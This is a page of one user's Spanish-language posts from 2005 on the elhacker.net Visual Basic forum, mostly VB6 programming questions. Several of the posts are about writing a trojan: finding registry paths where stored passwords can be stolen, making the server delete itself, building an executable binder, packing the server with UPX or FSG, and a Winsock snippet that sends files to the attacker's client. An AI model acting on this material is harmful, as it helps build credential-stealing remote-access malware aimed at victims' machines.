elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: 1 2 3 4 5 [6] 7
51  Programación / Programación Visual Basic / Password en windows en: 30 Agosto 2005, 17:44 pm
Weno, queria decirles, que ay mucha gente en este foro programando troyanos y tal, y ay un tema del que no se a ablado, todos o casi todos los trayanos tenen la funcion de robar password del msn, IE, mozilla administrador...

ALguien saben en que ruta del registro se encuentra alguna internesante?

salu2
52  Programación / Programación Visual Basic / Error de la aplicacion en: 5 Agosto 2005, 20:11 pm
Hola a todos ua vez mas  ;D

El problema que tengo es que e creado una aplicacion que usa una referencia del msn, "Messenger API type library", y si el msn no esta instalado me da un error, igual que cuanto te falta alguna libreria o algun ocx, la pregunta seria :
¿Ay alguna manera de que no te muestre en la pantalla ese mensaje de error y se cierre en caso de no encontrar ese archivo?

salu2
53  Programación / Programación Visual Basic / Eliminar archivo en: 2 Agosto 2005, 15:58 pm
Hola a todos, mirar, yo desde mi client mando una orden para que desistale el server, pero lo unico que ace es eliminar la clave del registro que ace que se inicie, aparentemente ya esta desinstalado, por que el programa ya no va a funcionar mas, pero ¿¿¿como podira acer para que ademas de borrarle del registro se elimira a si mismo el programa???

Salu2
54  Programación / Programación Visual Basic / Buscar archivos en un FTP en: 18 Julio 2005, 10:33 am
A ver mi problema, cuando los visitantes de mi pagina web suben un archivo al ftp se renombra automaticamente y queda asi "foto3", "foto4", "foto5"... todas igual, lo unico que cambia es el numero del final, pues  mirar, yo e echo un programa, que se descarga todas esas imagenes automaticamente, todas las imagenes de la carpeta llamadas "foto" y un numero, mi duda seria, Si en una capata tengo archivos con nombres diferentes, pero con la misma extension ".jpg" ¿Podria usar algo como "*.jpg?

Solo quiero sujerencias  ;)

Salu2
55  Programación / Programación Visual Basic / Transferencia de archivos, AYUDA en: 11 Julio 2005, 00:34 am
Hola a todos, pues el problema es que en el trayano que estoy haciendo al enviar los archivos no les envia enteros, solo envia un poco del principio, aqui os dejo el codigo a ver si alguno encontrais el problema, por que llo llevo mas de una semana y no lo e encontrao.

Nota : "vbParseData" lo utilizo para partir los archivos a la llegada seria igual que lo que usais muchos "|" .

Código:
Dim i As Long
Dim Arch As String
Dim Buffer as string
Arch = "C:\stub.log"
Buffer = Space$(25000)
   
    Open Arch For Binary Access Read As #1
     
    For i = 1 To FileLen(Arch) / 25000 'hacemos la division de las veces que tendra que leer y enviar
    Get #1, , Buffer 'leemos
    Winsock_server.SendData "archi" & vbParseData & Buffer
    DoEvents
   
    If FileLen(Arch) - Loc(1) <= 25000 Then 'como el for no utiliza los  decimales enviamos los restos
    Buffer = Space$(FileLen(Arch) - Loc(1)) 'redimensianamos la variable con el num de bites que faltan
    Get #1, , Buffer 'leemos
    Winsock_server.SendData "archi" & vbParseData & Buffer
    DoEvents
    End If
    Next i

    Winsock_server.SendData "fin"
    Close #1

Salu2
56  Programación / Programación Visual Basic / Cambiar icono en: 10 Julio 2005, 03:06 am
Hola, Estoy acabando un blinder, y me gustaria que se pudiera seleccionar el icono de un Imagelist o algo asi para que al compilarlo el ejecutable resultante tenga ese icono.

Ayuda please, donde puedo guardar los iconos, en un Imagelist?

Salu2
57  Programación / Programación Visual Basic / Limitar decimales y winsock en: 28 Junio 2005, 21:50 pm
Hola

1  Tengo un problema, al pasar de bytes a kbytes divido ente 1024 pero el resultado tiene muchos decimales, ¿como podria acer para que solo me mostrara 2?

2  Cuando no estoy conectado con el server y pulso un boton me da el error de que no estoy en el estado correcto para mandar nada, el problema es que si tengo que poner en todos los botones :

Código:
if ws.state = 7 then
ws.senddata "algo"
else
Msgbox "conectate primero"
end if

¿Hay alguna manera de hacerlo para todos a la vez o directamente que no muestre el error y que no pase nada?

Salu2
58  Programación / Programación Visual Basic / Compresion del ejecutable. en: 8 Junio 2005, 23:37 pm
Hola

El tamaño de un servidor de un troyano que e echo ocupa 208 Kb y comprimido con upx pesa 72 Kb.

Me prodriais explicar cual es el mejor compresor de ejecutables. Y explicarme las diferencias entre UPX y FSG.

Salu2
59  Programación / Programación Visual Basic / Problema con Listview en: 2 Junio 2005, 00:09 am
Hola

Al mostrar datos en un listview me da un error que dice "Imagelist debe iniciarse antes de poder usarla"

Me podeis decir como se inicia.

Gracias.

Salu2
60  Programación / Programación Visual Basic / Estilo XP en vb6 en: 31 Mayo 2005, 19:39 pm
Hola, he creado un manifest k da a los programas de vb6 el estilo de xp, el problema esta en que este archivo tiene que estar en la misma carpeta que el ejecutable y si se borra adios al estilo,
Hay alguna manera de agregar este archivo al proyecto para que este dentro de el ejecutable.

Si se puede poner el estilo XP de otra manera tambien me serviria.

Salu2
Páginas: 1 2 3 4 5 [6] 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines